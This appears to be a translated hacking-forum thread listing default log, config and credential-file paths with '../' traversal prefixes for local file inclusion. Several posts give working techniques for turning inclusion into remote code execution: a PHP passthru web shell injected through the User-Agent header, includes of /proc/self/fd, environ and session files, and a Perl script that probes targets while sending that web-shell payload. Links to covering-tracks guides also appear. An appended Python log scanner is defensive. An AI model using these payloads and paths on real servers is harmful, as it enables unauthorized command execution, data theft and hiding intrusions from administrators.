Default *log, *conf files locations

Discussion in 'Vulnerabilities' started by ettee, 24 Sep 2007.

  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Apache:
    *log
    Code:
    ../../../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../../../var/log/httpd/error_log
    ../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../var/log/httpd/error_log
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../apache2/logs/error.log
    ../apache2/logs/access.log
    ../../apache2/logs/error.log
    ../../apache2/logs/access.log
    ../../../apache2/logs/error.log
    ../../../apache2/logs/access.log
    ../../../../apache2/logs/error.log
    ../../../../apache2/logs/access.log
    ../../../../../apache2/logs/error.log
    ../../../../../apache2/logs/access.log
    ../logs/error.log
    ../logs/access.log
    ../../logs/error.log
    ../../logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../usr/local/apache2/logs/access_log
    ../../../../../../../../../../usr/local/apache2/logs/access.log
    ../../../../../../../../../../usr/local/apache2/logs/error_log
    ../../../../../../../../../../usr/local/apache2/logs/error.log
    ../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../var/log/httpd/access.log
    ../../../../../../../../../../var/log/httpd/error_log
    ../../../../../../../../../../var/log/httpd/error.log
    ../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../var/log/apache2/access_log
    ../../../../../../../../../../var/log/apache2/access.log
    ../../../../../../../../../../var/log/apache2/error_log
    ../../../../../../../../../../var/log/apache2/error.log
    ../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../var/log/access.log
    ../../../../../../../../../../var/log/error_log
    ../../../../../../../../../../var/log/error.log
    ../../../../../../../../../../opt/lampp/logs/access_log
    ../../../../../../../../../../opt/lampp/logs/error_log
    ../../../../../../../../../../opt/xampp/logs/access_log
    ../../../../../../../../../../opt/xampp/logs/error_log
    ../../../../../../../../../../opt/lampp/logs/access.log
    ../../../../../../../../../../opt/lampp/logs/error.log
    ../../../../../../../../../../opt/xampp/logs/access.log
    ../../../../../../../../../../opt/xampp/logs/error.log
    ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
    ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../../../../../../apache/logs/error.log
    ../../../../../../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../../apache/logs/error.log
    ../../../../../../../../apache/logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../logs/error.log
    ../../../../../../logs/access.log
    ../../../../../../../logs/error.log
    ../../../../../../../logs/access.log
    ../../../../../../../../logs/error.log
    ../../../../../../../../logs/access.log
    ../../../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/log/error_log
    *conf
    Code:
    ../../../../../../usr/local/apache/conf/httpd.conf
    ../../../../../../usr/local/apache2/conf/httpd.conf
    ../../../../../../etc/httpd/conf/httpd.conf
    ../../../../../../etc/apache/conf/httpd.conf
    ../../../../../../usr/local/etc/apache/conf/httpd.conf
    ../../../../../../etc/apache2/httpd.conf
    ../../../../../../../../../usr/local/apache/conf/httpd.conf
    ../../../../../../../../../usr/local/apache2/conf/httpd.conf
    ../../../../../../../../usr/local/apache/httpd.conf
    ../../../../../../../../usr/local/apache2/httpd.conf
    ../../../../../../../../usr/local/httpd/conf/httpd.conf
    ../../../../../../../usr/local/etc/apache/conf/httpd.conf
    ../../../../../../../usr/local/etc/apache2/conf/httpd.conf
    ../../../../../../../usr/local/etc/httpd/conf/httpd.conf
    ../../../../../../../usr/apache2/conf/httpd.conf
    ../../../../../../../usr/apache/conf/httpd.conf
    ../../../../../../../usr/local/apps/apache2/conf/httpd.conf
    ../../../../../../../usr/local/apps/apache/conf/httpd.conf
    ../../../../../../etc/apache/conf/httpd.conf
    ../../../../../../etc/apache2/conf/httpd.conf
    ../../../../../../etc/httpd/conf/httpd.conf
    ../../../../../../etc/http/conf/httpd.conf
    ../../../../../../etc/apache2/httpd.conf
    ../../../../../../etc/httpd/httpd.conf
    ../../../../../../etc/http/httpd.conf
    ../../../../../../etc/httpd.conf
    ../../../../../opt/apache/conf/httpd.conf
    ../../../../../opt/apache2/conf/httpd.conf
    ../../../../var/www/conf/httpd.conf
    ../../../private/etc/httpd/httpd.conf
    ../../../private/etc/httpd/httpd.conf.default
    ../../Volumes/webBackup/opt/apache2/conf/httpd.conf
    ../../Volumes/webBackup/private/etc/httpd/httpd.conf
    ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
    ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
    ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
    ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
    ../../../../../../../../../usr/local/php/httpd.conf.php
    ../../../../../../../../../usr/local/php4/httpd.conf.php
    ../../../../../../../../../usr/local/php5/httpd.conf.php
    ../../../../../../../../../usr/local/php/httpd.conf
    ../../../../../../../../../usr/local/php4/httpd.conf
    ../../../../../../../../../usr/local/php5/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
    /usr/local/etc/apache/vhosts.conf
    php.ini
    Code:
    ../../../../../../../../../etc/php.ini
    ../../../../../../../../../bin/php.ini
    ../../../../../../../../../etc/httpd/php.ini
    ../../../../../../../../../usr/lib/php.ini
    ../../../../../../../../../usr/lib/php/php.ini
    ../../../../../../../../../usr/local/etc/php.ini
    ../../../../../../../../../usr/local/lib/php.ini
    ../../../../../../../../../usr/local/php/lib/php.ini
    ../../../../../../../../../usr/local/php4/lib/php.ini
    ../../../../../../../../../usr/local/php5/lib/php.ini
    ../../../../../../../../../usr/local/apache/conf/php.ini
    ../../../../../../../../../etc/php4.4/fcgi/php.ini
    ../../../../../../../../../etc/php4/apache/php.ini
    ../../../../../../../../../etc/php4/apache2/php.ini
    ../../../../../../../../../etc/php5/apache/php.ini
    ../../../../../../../../../etc/php5/apache2/php.ini
    ../../../../../../../../../etc/php/php.ini
    ../../../../../../../../../etc/php/php4/php.ini
    ../../../../../../../../../etc/php/apache/php.ini
    ../../../../../../../../../etc/php/apache2/php.ini
    ../../../../../../../../../web/conf/php.ini
    ../../../../../../../../../usr/local/Zend/etc/php.ini
    ../../../../../../../../../opt/xampp/etc/php.ini
    ../../../../../../../../../var/local/www/conf/php.ini
    ../../../../../../../../../etc/php/cgi/php.ini
    ../../../../../../../../../etc/php4/cgi/php.ini
    ../../../../../../../../../etc/php5/cgi/php.ini
    ../../../../../../../../../php5\php.ini
    ../../../../../../../../../php4\php.ini
    ../../../../../../../../../php\php.ini
    ../../../../../../../../../PHP\php.ini
    ../../../../../../../../../WINDOWS\php.ini
    ../../../../../../../../../WINNT\php.ini
    ../../../../../../../../../apache\php\php.ini
    ../../../../../../../../../xampp\apache\bin\php.ini
    ../../../../../../../../../NetServer\bin\stable\apache\php.ini
    ../../../../../../../../../home2\bin\stable\apache\php.ini
    ../../../../../../../../../home\bin\stable\apache\php.ini
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
    
    Cpanel:
    *log
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    *conf
    /var/cpanel/cpanel.config

    MySQL:
    *log
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    *conf
    /var/lib/mysql/my.cnf
    /etc/mysql/my.cnf
    /etc/my.cnf

    MySQL(Windows):
    *log
    Code:
    C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
    C:\Program Files\MySQL\data\hostname.err
    C:\Program Files\MySQL\data\mysql.log
    C:\Program Files\MySQL\data\mysql.err
    C:\Program Files\MySQL\data\mysql-bin.log
    C:\MySQL\data\hostname.err
    C:\MySQL\data\mysql.log
    C:\MySQL\data\mysql.err
    C:\MySQL\data\mysql-bin.log
    *conf
    Code:
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
    C:\Program Files\MySQL\my.ini
    C:\Program Files\MySQL\my.cnf
    C:\MySQL\my.ini
    C:\MySQL\my.cnf
    Mod Security:
    *log
    /usr/local/apache/logs/audit_log
    /logs/security_debug_log
    /logs/security_log
    *conf
    /usr/local/apache/conf/modsec.conf


    FTP:


    ProFTPD:
    *log
    /etc/logrotate.d/proftpd
    /www/logs/proftpd.system.log
    /var/log/proftpd
    *conf
    /etc/proftp.conf
    /etc/protpd/proftpd.conf
    /etc/vhcs2/proftpd/proftpd.conf
    /etc/proftpd/modules.conf

    vsftpd:
    *log
    /var/log/vsftpd.log
    /etc/vsftpd.chroot_list
    /etc/logrotate.d/vsftpd.log
    *conf
    /etc/vsftpd/vsftpd.conf
    /etc/vsftpd.conf
    /etc/chrootUsers

    wu-ftpd:
    *log
    /var/log/xferlog
    /var/adm/log/xferlog
    *conf
    /etc/wu-ftpd/ftpaccess
    /etc/wu-ftpd/ftphosts
    /etc/wu-ftpd/ftpusers

    Pure-FTPd:
    *conf
    /usr/sbin/pure-config.pl
    /usr/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.conf
    /usr/local/etc/pure-ftpd.conf
    /usr/local/etc/pureftpd.pdb
    /usr/local/pureftpd/etc/pureftpd.pdb
    /usr/local/pureftpd/sbin/pure-config.pl
    /usr/local/pureftpd/etc/pure-ftpd.conf
    -/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.pdb
    /etc/pureftpd.pdb
    /etc/pureftpd.passwd
    /etc/pure-ftpd/pureftpd.pdb
    DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
    OpenBSD: /usr/ports/net/pure-ftpd/
    NetBSD: /usr/pkgsrc/net/pureftpd/
    Crux Linux: /usr/ports/contrib/pure-ftpd/
    *log
    /var/log/pure-ftpd/pure-ftpd.log
    /logs/pure-ftpd.log
    /var/log/pureftpd.log

    Other:
    /var/log/ftp-proxy/ftp-proxy.log
    /var/log/ftp-proxy
    /var/log/ftplog
    /etc/logrotate.d/ftp
    /etc/ftpchroot
    /etc/ftphosts


    Mail server:
    Exim:
    *log
    /var/log/exim_mainlog
    /var/log/exim/mainlog
    /var/log/maillog
    /var/log/exim_paniclog
    /var/log/exim/paniclog
    /var/log/exim/rejectlog
    /var/log/exim_rejectlog

    Food for thought:
    - Command execution via local include
    - Logs for the smart
    - COVERING TRACKS IN LINUX
    - Say no to logs!
    - Fighting the log beasts
    - Fighting logs in *nix
    - Fighting logs in *nix #2
    - A Unix user's logbook
    - On hacking log files
    thx [53x]Shadow
     
    _________________________
  2. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508

    Attached is a simple little utility for checking GET includes.

    If you have a COMMON PATH that is missing from the list, post it.
     


  3. Elekt

    Elekt Banned

    So, I recall there was talk that including logs causes problems and so on.

    The error_log often records the "Referer".

    The access_log records the "User-Agent".

    And regarding the myth that the < > characters get encoded into their URL equivalents and "there's nothing you can do": run any HTTP sniffer and you will see that the browser is to blame, as it automatically converts the characters to URL encoding.
    Just send the packet with any tool such as AccessDriver.
     
  4. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    ...

    Code:
    ../../../../../../usr/local/apache/bin/httpd
    ../../../../../../../../../usr/local/apache/conf/httpd.conf.default
    ../../../../../../../../etc/httpd/logs/access_log
    ../../../../../../../../etc/httpd/logs/access.log
    ../../../../../../../../../usr/local/apache/conf/access.conf
    
     
  5. ettee

    ettee Administrator
    Staff Member

    MuddleFTPD

    *log
    Code:
    /var/log/muddleftpd
    /usr/sbin/mudlogd
    /etc/muddleftpd/mudlog
    *conf
    Code:
    /etc/muddleftpd.com
    /etc/muddleftpd/mudlogd.conf
    /etc/muddleftpd/muddleftpd.conf
    /var/log/muddleftpd.conf
    /usr/sbin/mudpasswd
    /etc/muddleftpd/muddleftpd.passwd
    /etc/muddleftpd/passwd
     
    _________________________
  6. ettee

    ettee Administrator
    Staff Member

    In most cases a server running Win NT stores its log files in the following directories:

    HTTP:
    %SystemRoot%\system32\logfiles\W3SVC#(W3SVC1,W3SVC2,W3SVC3...)\
    FTP:
    %SystemRoot%\system32\logfiles\MSFTPSVC#(MSFTPSVC4,MSFTPSVC5...)\
    SMTP:
    %SystemRoot%\system32\logfiles\SMTPSVC#(SMTPSVC1,SMTPSVC2...)\

    # denotes the website number (site number) (defaults to "1")

    The file name corresponds to its creation date: in02039.log (2002, 9 March)

    Note on log types:
    IIS is abbreviated as "in"
    W3C is abbreviated as "ex"
    NCSA is abbreviated as "nc"

    Logs of the standard Firewall:
    %SystemRoot%\system32\logfiles\Firewall\pfirewall.log
    %SystemRoot%\system32\logfiles\Firewall\pfirewall.log.old
     
    _________________________
  7. ettee

    ettee Administrator
    Staff Member

    lighttpd

    *log
    /var/log/lighttpd.error.log
    /var/log/lighttpd.access.log
    /var/lighttpd.log
    /var/logs/access.log
    /var/log/lighttpd/
    /var/log/lighttpd/error.log
    /var/log/lighttpd/access.www.log
    /var/log/lighttpd/error.www.log
    /var/log/lighttpd/access.log
    /usr/local/apache2/logs/lighttpd.error.log
    /usr/local/apache2/logs/lighttpd.log
    /usr/local/apache/logs/lighttpd.error.log
    /usr/local/apache/logs/lighttpd.log
    /var/log/lighttpd.access.log
    /var/log/lighttpd.error.log
    /usr/local/lighttpd/log/lighttpd.error.log
    /usr/local/lighttpd/log/access.log
    /var/log/lighttpd/mydomain/access.log
    /var/log/lighttpd/mydomain/error.log
    /usr/home/user/var/log/lighttpd.error.log
    /usr/home/user/var/log/apache.log

    *conf

    /home/user/lighttpd/lighttpd.conf
    /usr/home/user/lighttpd/lighttpd.conf
    /etc/lighttpd/lighthttpd.conf
    /usr/local/etc/lighttpd.conf
    /usr/local/lighttpd/conf/lighttpd.conf
    /usr/local/etc/lighttpd.conf.new
    /var/www/.lighttpdpassword

    Samba
    *conf
    /etc/smbpasswd
    /etc/smb.conf
    /etc/samba/smb.conf
    /etc/samba/samba.conf
    /etc/samba/smb.conf.user
    /etc/samba/smbpasswd
    /etc/samba/smbusers
    /etc/samba/private/smbpasswd
    /etc/samba/smb.conf.198.166.0.5
    /usr/local/samba/lib/smb.conf.198.166.0.5
    /usr/local/etc/smb.conf
    /usr/local/samba/lib/smb.conf.user
    /daten/home/gr-user



    *log
    /usr/local/samba/lib/log.user
    /usr/local/logs/samba.log
    /usr/local/samba/lib/log.198.166.0.5
    /var/log/samba/log.smbd
    /var/log/samba/log.nmbd
    /var/log/samba.log
    /var/log/samba.log1
    /var/log/samba.log2
    /var/log/samba/samba_198.166.0.5.log
    /var/log/samba/198.166.0.5.log
    /var/log/samba.198.166.0.5
    /var/log/samba.log.198.166.0.5
    /var/log/samba/198.166.0.5
    /var/log/log.smb
    /var/log/samba-log.198.166.0.5
    /etc/samba/netlogon
     
    _________________________
  8. ettee

    ettee Administrator
    Staff Member

    PostgreSQL

    *log
    /var/postgresql/log/postgresql.log
    /var/log/postgresql/postgresql.log
    /var/log/postgres/pg_backup.log
    /var/log/postgres/postgres.log
    /var/log/postgresql.log
    /var/log/pgsql/pgsql.log
    /var/log/postgresql/postgresql-8.1-main.log
    /var/log/pgsql8.log
    /var/log/postgresql/postgres.log
    /var/log/pgsql_log
    /var/log/postgresql/main.log
    /var/log/cron
    /var/log/postgres.log
    /usr/internet/pgsql/data/postmaster.log
    /usr/local/pgsql/data/postgresql.log
    /usr/local/pgsql/data/pg_log
    c:\PostgreSQL\log\pgadmin.log

    *conf
    /var/lib/pgsql/data/postgresql.conf
    /var/postgresql/db/postgresql.conf
    /var/nm2/postgresql.conf
    /usr/local/pgsql/data/postgresql.conf
    /usr/local/pgsql/data/pg_hba.conf
    /usr/internet/pgsql/data/pg_hba.conf
    /usr/local/pgsql/data/passwd
    /usr/local/pgsql/bin/pg_passwd
    /etc/postgresql/postgresql.conf
    /etc/postgresql/pg_hba.conf
    /home/postgres/data/postgresql.conf
    /home/postgres/data/PG_VERSION
    /home/postgres/data/pg_ident.conf
    /home/postgres/data/pg_hba.conf

    Error Reporting and Logging
     
    _________________________
  9. ettee

    ettee Administrator
    Staff Member

    ipfw (BSD)

    *log
    /var/log/ipfw.log
    /var/log/ipfw
    /var/log/ipfw/ipfw.log
    /var/log/ipfw.today


    *conf

    /etc/ipfw.rules
    /etc/ipfw.conf
    /etc/firewall.rules
     
    _________________________
  10. ettee

    ettee Administrator
    Staff Member

    *post update.

    Archive structure:
    _all_apache.log.txt
    _all_httpd.conf.txt
    _all_log.txt -LAMPP, XAMPP, Apache.
    _all_php.ini.txt
    _all_mysql.txt
    _all_mysql_win.txt
    _all_cpanel.txt
    _all_modsecurity.txt
    _all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD.
    _all_samba.txt
    _all_lighthttpd.txt
    _all_postgresq.txt
     


    _________________________
  11. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    1) using logs without knowing their path

    a. /proc/%{PID}/fd/%{FD_ID}

    %{PID} - the PID
    %{FD_ID} - the links (1,2,3,..,9); 2 and 7 are the Apache logs (not necessarily always; for me they were also 2 and 7)

    /proc/self/status - look up the PID
    /proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2

    index.php?inc=../../../../../proc/3661/fd/2
    User-Agent: <?php passthru($_GET['cmd']) ?>

    Code:
    dr-x------ 2 www-data www-data  0 Jan  2 18:27 .
    dr-xr-xr-x 6 www-data www-data  0 Jan  2 18:27 ..
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 0 -> /dev/null
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 1 -> pipe:[3113414]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 2 -> /var/log/apache2/error.log
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 3 -> socket:[2714910]
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 4 -> pipe:[2714921]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 5 -> pipe:[2714921]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 6 -> /var/log/apache2/access.log
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 7 -> /anon_inode:[eventpoll]
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 8 -> socket:[2742717]
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 9 -> /proc/27262/fd
    b. directly
    index.php?inc=../../../../../proc/self/fd/2
    User-Agent: <?php passthru($_GET['cmd']) ?>

    2) environment variables (correct me if I misunderstood)
    index.php?inc=../../../../../proc/self/environ
    POST:
    User-Agent: <?php passthru($_GET['cmd']) ?>

    3) mail
    PHP:
    <? 
    mail("ololo@localhost""<?php passthru(\$_GET['cmd']) ?>""fuckme");
    ?>
    index.php?inc=../../../../../var/mail/ololo
    index.php?inc=../../../../../var/spool/mail/ololo


    P.S.
    /proc/version
    /proc/self/cmdline
    /proc/devices


    based on
    Code:
    http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
    http://www.milw0rm.com/papers/260
    http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
     
    _________________________
  12. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Script for finding Apache log paths

    Code:
    #! /usr/bin/perl
    
    # perl script to search apache logs path
    # Example: 
    #   URL: http://site/index.php
    #   Variable: file
    #   Method: POST
    #
    # by Pepelux (pepelux[at]enye-sec[dot]org)
    
    use LWP::UserAgent;
    $ua = LWP::UserAgent->new;
    
    my ($host, $var, $method) = @ARGV ;
    
    unless($ARGV[2]) {
       print "Usage: perl $0 <url> <vulnerable_var> <method>\n";
       print "\tex: perl $0 http://site.com/index.php file GET\n";
       print "\tex: perl $0 http://site.com/index.php file POST\n\n";
       exit 1;
    }
    
    $ua->agent("<? passthru(\$_GET[cmd]) ?>");
    $ua->timeout(10);
    $host = "http://".$host if ($host !~ /^http:/);
    
    if ($method =~ /GET/) {
      $url = $host."?".$var."=../../../../proc/self/stat%00";
      $req = HTTP::Request->new(GET => $url);
      $req->header('Accept' => 'text/html');
    }
    else {
      $req = HTTP::Request->new(POST => $host);
      $req->content_type('application/x-www-form-urlencoded');
      $req->content($var."=../../../../proc/self/stat%00");
    }
    
    $res = $ua->request($req);
    
    if ($res->is_success) { 
      $result = $res->content;
      $result =~ s/<[^>]*>//g;
      $x = index($result, " ", 0);
      $pid = substr($result, 0, $x);
    
      print "Apache PID: ".$pid."\n";
    }
    
    if ($method =~ /GET/) {
      $url = $host."?".$var."=../../../../proc/self/status%00";
      $req = HTTP::Request->new(GET => $url);
      $req->header('Accept' => 'text/html');
    }
    else {
      $req = HTTP::Request->new(POST => $host);
      $req->content_type('application/x-www-form-urlencoded');
      $req->content($var."=../../../../proc/self/status%00");
    }
    
    $res = $ua->request($req);
    
    if ($res->is_success) { 
      $result = $res->content;
      $result =~ s/<[^>]*>//g;
      $x = index($result, "FDSize",0)+8;
      $fdsize = substr($result, $x, 3);
    
      print "FD_SIZE: ".$fdsize."\n";
    }
    
    for ($cont = 0; $cont < $fdsize; $cont++) {
      $file = "../../../../proc/".$pid."/fd/".$cont;
      open FILE, $file;
    
      while(<FILE>) {
        if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) {
          print "FD: ".$cont."\n";
          exit;
        }
      }
    }
    
     
  13. ShAnKaR

    ShAnKaR Pack of margarine

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    I checked a bit of what c411k wrote: the mail file is accessible only to the user whose mail it is, so to read it Apache also has to run as that same user; accounts like www, nobody and apache are not allowed to have a mailbox by default.
    /proc/self/environ is empty for me; I don't know how it would be with PHP in CGI mode. The log files are indeed read without trouble, but only if the permissions allow it; I checked on other hosts and only root can read the logs (. Then you can also do an include via the session file; for me it is at /proc/self/fd/10
     
  14. ettee

    ettee Administrator
    Staff Member

    Consider the situation where a unique user is assigned an SID (Session IDentifier) without any filtering of the incoming content.
    Regardless of how it is passed (Cookie/Query string), a "session file" will be created on the server, provided that session.save_handler is set to files, in the directory defined by the session.save_path directive. The main advantage is that the hosts on the server are served by a single process.

    Session.save_path:
    /tmp/sess_<session_id>
    /php_sess/sess_<session_id>
    /tmp/php-sess/sess_<session_id>
    /home/%username%/tmp/sess_<session_id>

    ../../../../tmp/sess_7083093d3b1e818d5c86c79b0f62a374&cmd=id
     
    _________________________
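Added example, not part of the thread: a defender-side check over Apache Combined Log Format lines for the request patterns discussed in the posts above (traversal into /proc/self/fd, /proc/self/environ, log, config and session files, and a PHP tag in the logged User-Agent or Referer). The function names, finding labels and sample log lines are constructed for illustration; the log format is an assumption about the server's LogFormat.

```python
import re
from urllib.parse import unquote

# Apache Combined Log Format (assumed):
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Two or more consecutive "../" or "..\" steps.
TRAVERSAL = re.compile(r'(?:\.\.[/\\]){2,}')

# File classes named in the thread as include targets.
TARGETS = {
    "procfs": re.compile(r'/proc/(?:self|\d+)/(?:fd/\d+|environ|cmdline|status|stat)\b'),
    "log_file": re.compile(r'(?:access|error)[._]log\b'),
    "server_config": re.compile(r'(?:httpd\.conf|php\.ini|my\.cnf)\b'),
    "session_file": re.compile(r'/sess_[0-9A-Za-z,-]+'),
    "mail_spool": re.compile(r'/var/(?:spool/)?mail/'),
}

# PHP open tag arriving in a header that the server writes to its logs.
PHP_TAG = re.compile(r'<\?(?:php|=|\s)', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def classify(line):
    """Return a sorted list of findings for one log line, or None if unparsable."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    parts = m.group("request").split(" ")
    uri = parts[1] if len(parts) >= 2 else m.group("request")
    decoded, rounds = decode_fully(uri)

    findings = set()
    if TRAVERSAL.search(decoded):
        findings.add("traversal")
    if "\x00" in decoded:
        findings.add("null_byte")          # %00 used to cut off an appended suffix
    if rounds > 1:
        findings.add("double_encoding")    # e.g. %252e%252e%252f
    for name, pattern in TARGETS.items():
        if pattern.search(decoded):
            findings.add("target:" + name)
    for field, label in (("agent", "php_in_user_agent"), ("referer", "php_in_referer")):
        if PHP_TAG.search(decode_fully(m.group(field))[0]):
            findings.add(label)
    return sorted(findings)


def scan(lines):
    """Return (client host, findings) for every line with at least one finding."""
    flagged = []
    for line in lines:
        findings = classify(line)
        if findings:
            flagged.append((line.strip().split(" ", 1)[0], findings))
    return flagged


# Constructed sample lines (documentation address ranges), not from a real server.
SAMPLE_LOG = r'''
192.0.2.10 - - [02/Jan/2009:18:27:01 +0000] "GET /index.php?inc=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jan/2009:18:27:05 +0000] "GET /index.php?inc=../../../../../proc/self/fd/2 HTTP/1.1" 200 4096 "-" "<?php /* constructed marker */ ?>"
203.0.113.5 - - [02/Jan/2009:18:28:11 +0000] "GET /index.php?inc=..%2f..%2f..%2f..%2ftmp%2fsess_7083093d3b1e818d5c86c79b0f62a374&cmd=id HTTP/1.1" 200 230 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Jan/2009:18:29:40 +0000] "GET /index.php?inc=%252e%252e%252f%252e%252e%252fetc%252fphp.ini%2500 HTTP/1.1" 404 198 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG):
        print(host, ", ".join(findings))
```

A PHP tag in a logged header is worth alerting on by itself, since it is only dangerous once some include path reaches the log; the traversal findings show whether such a path was then requested.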
  15. f1rebl00d

    f1rebl00d Elder

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    osx

